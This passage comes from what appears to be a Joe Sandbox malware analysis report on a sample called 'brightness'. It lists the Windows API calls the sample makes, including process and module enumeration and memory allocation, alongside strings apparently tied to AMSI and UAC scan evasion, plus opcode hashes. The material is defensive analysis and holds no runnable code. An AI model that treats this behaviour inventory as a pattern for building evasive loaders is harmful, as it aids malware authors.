                                                                                                                                                                           • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2796650324-0
                                                                                                                                                                          • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                                                          • Instruction ID: 16f02471ba9fe13a574cc3a7b80487851a15153edd7f3eeb9609745ce476e814
                                                                                                                                                                          • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                                                          • Instruction Fuzzy Hash: 05E06571A002188FCB14DE6888C0A8637D8BF08750F8109A5ED58DF38AD3B0DD608FE0
                                                                                                                                                                          APIs
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02907DA8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
• Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,0291FD00,ScanString,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanString,0296237C,0292B40C,UacScan,0296237C,0292B40C,UacInitialize), ref: 02907E1B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
• Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,02922E7D,ScanString,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,Initialize), ref: 02907E3F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
• Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
• Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3341692771-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SysFreeString.OLEAUT32(0291ED84), ref: 02904C1A
                                                                                                                                                                          • SysReAllocStringLen.OLEAUT32(0292C2B4,0291ED84,000000B4), ref: 02904C62
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
• Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$AllocFree
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 344208780-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • timeSetEvent.WINMM(00002710,00000000,0292BF78,00000000,00000001), ref: 0292BF94
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
• Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Eventtime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2982266575-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02904BEB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
• Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2525500382-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02904C03
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
• Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3341692771-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02901A03,?,02902000), ref: 029015E2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02902000), ref: 029016A4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02901704
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0291ABDB,?,?,0291AC6D,00000000,0291AD49), ref: 0291A968
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0291A980
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0291A992
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0291A9A4
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0291A9B6
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0291A9C8
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0291A9DA
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0291A9EC
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0291A9FE
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0291AA10
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0291AA22
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0291AA34
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0291AA46
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0291AA58
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0291AA6A
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0291AA7C
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0291AA8E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                          • API String ID: 667068680-597814768
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,02907330,02900000,0292E790), ref: 029058D1
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029058E8
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?), ref: 02905918
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02907330,02900000,0292E790), ref: 0290597C
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02907330,02900000,0292E790), ref: 029059B2
                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02907330,02900000,0292E790), ref: 029059C5
                                                                                                                                                                          • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02907330,02900000,0292E790), ref: 029059D7
                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02907330,02900000,0292E790), ref: 029059E3
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02907330,02900000), ref: 02905A17
                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02907330), ref: 02905A23
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02905A45
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                          • API String ID: 3245196872-1565342463
                                                                                                                                                                          • Opcode ID: cd67ced5a8eb66b4f8a327f001917642bb420d918b351dbbe0e955014fc9388e
                                                                                                                                                                          • Instruction ID: 21ea11e3a9ba8686979c2074f08458f0ed82b6e8e51211b2f8388ca496123e9c
                                                                                                                                                                          • Opcode Fuzzy Hash: cd67ced5a8eb66b4f8a327f001917642bb420d918b351dbbe0e955014fc9388e
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D415972D0025DAFDF10DAE8CCC8ADEB3AEBF88340F4545A5A548E7281E7709E848F50
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02905B94
                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02905BA1
                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02905BA7
                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02905BD2
                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02905C19
                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02905C29
                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02905C51
                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02905C61
                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02905C87
                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02905C97
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                          • API String ID: 1599918012-2375825460
                                                                                                                                                                          • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                                                          • Instruction ID: 4b742e49320376fe1032128520df7ee0e3a373eeac34abaf8586aa5bfab8720b
                                                                                                                                                                          • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                                                          • Instruction Fuzzy Hash: 9A319371E4022C6EEF25D6B88CC9BDF77ED5B44380F4545E1A608E61C5DA749E848F90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02907F75
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DiskFreeSpace
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1705453755-0
                                                                                                                                                                          • Opcode ID: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                                                                                                                          • Instruction ID: 82549167c9f249de051ae610fbcad183a742ba8ced5a528714cd1225ecc2cb5d
                                                                                                                                                                          • Opcode Fuzzy Hash: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                                                                                                                          • Instruction Fuzzy Hash: F31100B5A00209AF9B04CF99C8809BFF7F9FFC8704B14C569A504EB254E6319A01CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A762
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                          • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                                                                                          • Instruction ID: 6ddae238a1a5c8c9028d8704a63679cb9fa64fa281694bdec49fddbda5a100f8
                                                                                                                                                                          • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                                                                                          • Instruction Fuzzy Hash: 62E0D836B0021C1BD711A5685CC0AFE739D9B9C310F00817EBE05C73C0EEA0AD804EE4
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVersionExA.KERNEL32(?,0292D106,00000000,0292D11E), ref: 0290B71A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Version
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                          • Opcode ID: 80a49eb307bd9b317d9d30c1671dcf9b045a41b38492d78462f53a3d794ec875
                                                                                                                                                                          • Instruction ID: 90ab417ac0057f6f01dbfdfab3585d113d53bf6e751f4e5dfbc5ab70994660b9
                                                                                                                                                                          • Opcode Fuzzy Hash: 80a49eb307bd9b317d9d30c1671dcf9b045a41b38492d78462f53a3d794ec875
                                                                                                                                                                          • Instruction Fuzzy Hash: C9F0AF749483059FD364DF28D5C0A2677EDFB88B14F019D29EAD8C7790E734A8288F52
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0290BDF2,00000000,0290C00B,?,?,00000000,00000000), ref: 0290A7A3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
